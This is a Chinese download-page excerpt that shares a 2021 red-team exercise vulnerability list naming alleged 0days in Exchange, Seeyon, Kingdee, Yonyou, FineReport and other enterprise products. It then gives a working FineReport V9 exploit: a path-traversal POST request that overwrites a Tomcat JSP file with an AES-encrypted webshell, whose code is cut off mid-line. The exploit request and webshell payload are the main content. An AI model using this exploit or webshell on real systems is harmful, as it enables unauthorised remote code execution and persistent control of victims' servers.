HW漏洞利用........
需积分: 10 116 浏览量
2022-08-15
20:26:56
上传
评论
收藏 294KB DOCX 举报
2021.4.8 情报共享 第一批
exchange、致远、天眼、shiro 存在 0day
金蝶 K3Cloud 命令执行 全版本 前台 默认配置
和信创天云桌面系统命令执行,文件上传 全版本 前台 默认配置
用友 U8Cloud 命令执行
h3c 计算管理平台任意账户添加 2016 年版
红帆 OA 任意文件写入漏洞
启明星辰天清汉马 USG 防火墙存在逻辑缺陷漏洞(CVE 已有)
帆软系统疑似存在 0day,被 RCE。
帆软 V9getshell FineReport V9
注意: 这个漏洞是任意文件覆盖,上传 JSP 马,需要找已存在的 jsp 文件进行覆盖 Tomcat
启动帆软后默认存在的 JSP 文 件 : 比如: /tomcat-7.0.96/webapps/ROOT/index.jsp
覆盖 Tomcat 自带 ROOT 目录下的 index.jsp:
POST /WebReport/ReportServer?
op=svginit&cmd=design_save_svg&filePath=chartmapsvg/../../../../WebReport/update .jsp
HTTP/1.1Host: 192.168.169.138:8080User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.92 Safari/537.36Connection:
closeAccept-Au: 0c42b2f264071be0507acea1876c74Content-Type:
text/xml;charset=UTF-8Content-Length: 675 {"__CONTENT__":"<%@page
import=\"java.util.*,javax.crypto.*,javax.crypto.spec.*\"%><%!class U extends
ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return
super.defineClass(b,0,b.length);}}%><%if(request.getParameter(\"pass\")!=null) {String
k=(\"\"+UUID.randomUUID()).replace(\"-\",\"\").substring(16);session.putValue(\"u\",k);out.pri
nt(k);return;}Cipher c=Cipher.getInstance(\"AES\");c.init(2,new
SecretKeySpec((session.getValue(\"u\")+\"\").getBytes(),\"AES\"));new
U(this.getClass().getClassLoader()).g(c.doFinal(new
资源评论
